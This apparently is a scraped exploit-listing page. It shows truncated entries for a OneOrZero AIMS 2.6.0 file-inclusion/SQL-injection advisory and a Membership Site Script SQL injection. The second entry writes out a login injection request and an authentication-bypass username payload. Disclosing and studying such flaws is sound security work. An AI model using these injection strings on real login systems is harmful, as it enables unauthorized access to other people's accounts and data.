OneOrZero AIMS 2.6.0 Members Edition Local File Inclusion / SQL Injection

Exploit Title: OneOrZero AIMS v2.6.0 Members Edition Multiple Vulnerabilities Date: 13.11.2010 Author: Valentin Category: webapps/0day Version: 2.6.0 Tested on: CVE : Code : :::::::::::::::::::::::::::::::::::::: 0x1 :::::::::::::::::::::::::::::::::::::: General Information Advisory/Exploit Titl...

Membership Site Script SQL Injection Vulnerability

http://localhost/membershipscript/login.php submit=1&email protectedSQL&password=123456 Authentication Bypass : http://localhost/membershipscript/login.php Username: email protected 'or''=' Password: empty ================================================== Membership Site Script SQL Injection...